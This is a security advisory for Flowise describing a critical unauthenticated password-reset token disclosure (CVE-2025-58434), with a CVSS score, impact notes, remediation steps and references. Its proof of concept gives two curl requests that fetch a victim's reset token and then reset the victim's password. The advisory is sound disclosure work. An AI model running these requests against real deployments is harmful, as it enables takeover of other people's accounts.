
GHSA-wgpv-6j63-x5ph: Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

    • User ID, name, email, hashed credential, status, timestamps.
    • A valid tempToken and its expiry, which is intended for password reset.
  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.

  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.


PoC

  1. Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
  2. Use the exposed tempToken to reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Expected Result: 200 OK
The victim’s account password is reset, allowing full login.


Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

    • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
    • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
    • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
    • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit


⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).



References

  • GHSA-wgpv-6j63-x5ph
  • https://nvd.nist.gov/vuln/detail/CVE-2025-58434
  • FlowiseAI/Flowise@9e178d6
